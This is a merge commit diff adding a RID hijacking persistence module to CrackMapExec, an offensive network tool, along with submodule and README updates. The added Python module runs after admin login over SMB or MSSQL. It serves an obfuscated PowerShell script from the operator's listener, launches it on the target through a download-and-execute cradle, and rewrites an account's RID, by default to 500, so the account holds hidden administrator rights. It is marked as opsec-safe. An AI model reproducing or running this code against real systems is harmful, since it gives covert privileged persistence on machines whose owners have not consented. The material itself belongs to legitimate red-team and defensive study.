Merge pull request #295 from r4wd3r/rid_hijacking

Add RID Hijacking Persistence Module

Author: byt3bl33d3r

.gitmodules

@@ -28,3 +28,6 @@
 [submodule "cme/thirdparty/pywerview"]
 	path = cme/thirdparty/pywerview
 	url = https://github.com/the-useless-one/pywerview
+[submodule "cme/data/RID-Hijacking"]
+	path = cme/data/RID-Hijacking
+	url = https://github.com/r4wd3r/RID-Hijacking.git

MANIFEST.in

@@ -12,6 +12,8 @@ prune cme/data/powersploit/Recon/Dictionaries
 prune cme/data/invoke-vnc/vncdll
 prune cme/data/invoke-vnc/winvnc
 prune cme/data/invoke-vnc/ReflectiveDLLInjection
+prune cme/data/RID-Hijacking/modules
+prune cme/data/RID-Hijacking/slides
 recursive-exclude cme/data/invoke-vnc *.py *.bat *.msbuild *.sln pebytes.ps1
 prune cme/data/netripper/DLL
 prune cme/data/netripper/Metasploit
@@ -20,4 +22,4 @@ prune cme/data/netripper/Release
 prune cme/data/netripper/Win32
 prune cme/data/netripper/minhook
 prune cme/data/netripper/x64
-recursive-exclude cme/data/netripper *.pdf *.sln
+recursive-exclude cme/data/netripper *.pdf *.sln

README.md

@@ -32,7 +32,7 @@ This repository contains the following repositories as submodules:
 - [RandomPS-Scripts](https://github.com/xorrior/RandomPS-Scripts)
 - [SessionGopher](https://github.com/fireeye/SessionGopher)
 - [Mimipenguin](https://github.com/huntergregal/mimipenguin)
-
+- [RID-Hijacking](https://github.com/r4wd3r/RID-Hijacking)
 # Documentation, Tutorials, Examples
 See the project's [wiki](https://github.com/byt3bl33d3r/CrackMapExec/wiki) for documentation and usage examples
 

README.rst

@@ -32,7 +32,8 @@ This repository contains the following repositories as submodules: -
 - `Invoke-Vnc <https://github.com/artkond/Invoke-Vnc>`__ -
 `Mimikittenz <https://github.com/putterpanda/mimikittenz>`__ -
 `NetRipper <https://github.com/NytroRST/NetRipper>`__ -
-`RandomPS-Scripts <https://github.com/xorrior/RandomPS-Scripts>`__
+`RandomPS-Scripts <https://github.com/xorrior/RandomPS-Scripts>`__ -
+`RID-Hijacking <https://github.com/r4wd3r/RID-Hijacking>`
 
 Documentation, Tutorials, Examples
 ==================================

cme/data/RID-Hijacking

@@ -0,0 +1,89 @@
+from cme.helpers.powershell import *
+from cme.helpers.logger import write_log, highlight
+from datetime import datetime
+from StringIO import StringIO
+import re
+
+class CMEModule:
+    '''
+        Executes Invoke-RIDhijacking.ps1 allowing to set desired privileges to an existent local account by modifying the Relative Identifier value copy used to create the access token
+        Module by Sebastian Castro @r4wd3r
+    '''
+
+    name = 'rid_hijack'
+    description = "Executes the RID hijacking persistence hook."
+    supported_protocols = ['smb', 'mssql']
+    opsec_safe = True
+    multiple_hosts = True
+
+    def options(self, context, module_options):
+        '''
+            RID             RID to set to the specified account. Default 500.
+            USER            User to set the defined RID.
+            USEGUEST        Boolean. Set the defined RID to the Guest account.
+            PASSWORD        Password to set to the defined account.
+            ENABLE          Boolean. Enable the defined account.
+        '''
+
+        self.rid = 500
+        self.user = None
+        self.password = None
+        self.useguest = False
+        self.enable = False
+        
+        if 'RID' in module_options:
+            self.rid = int(module_options['RID'])
+        if 'USER' in module_options:
+            self.user = str(module_options['USER'])
+        if 'PASSWORD' in module_options:
+            self.password = str(module_options['PASSWORD'])
+        if 'USEGUEST' in module_options:
+            self.useguest = True
+        if 'ENABLE' in module_options:
+            self.enable = True
+
+        self.ps_script1 = obfs_ps_script('RID-Hijacking/Invoke-RIDHijacking.ps1')
+
+    def on_admin_login(self, context, connection):
+        command = 'Invoke-RIDHijacking'
+        command += ' -RID ' + str(self.rid)
+        if self.user:
+            command += ' -User ' + self.user
+        if self.password:
+            command += ' -Password ' + self.password
+        if self.useguest:
+            command += ' -UseGuest '
+        if self.enable:
+            command += ' -Enable '
+
+        launcher = gen_ps_iex_cradle(context, 'Invoke-RIDHijacking.ps1', command)
+        connection.ps_execute(launcher)
+        context.log.success('Executed launcher')
+
+    def on_request(self, context, request):
+        if 'Invoke-RIDHijacking.ps1' == request.path[1:]:
+            request.send_response(200)
+            request.end_headers()
+
+            request.wfile.write(self.ps_script1)
+
+        else:
+            request.send_response(404)
+            request.end_headers()
+
+    def on_response(self, context, response):
+        response.send_response(200)
+        response.end_headers()
+        length = int(response.headers.getheader('content-length'))
+        data = response.rfile.read(length)
+
+        response.stop_tracking_host()
+
+        if len(data):
+            context.log.success('Invoke-RIDHijacking executed successfully')
+            buf = StringIO(data.strip()).readlines()
+
+            for line in buf:
+                output = filter(None, re.split(r'(?:\s*\[.\]\s)', line.strip()))
+                for o in output:
+                    context.log.highlight(o)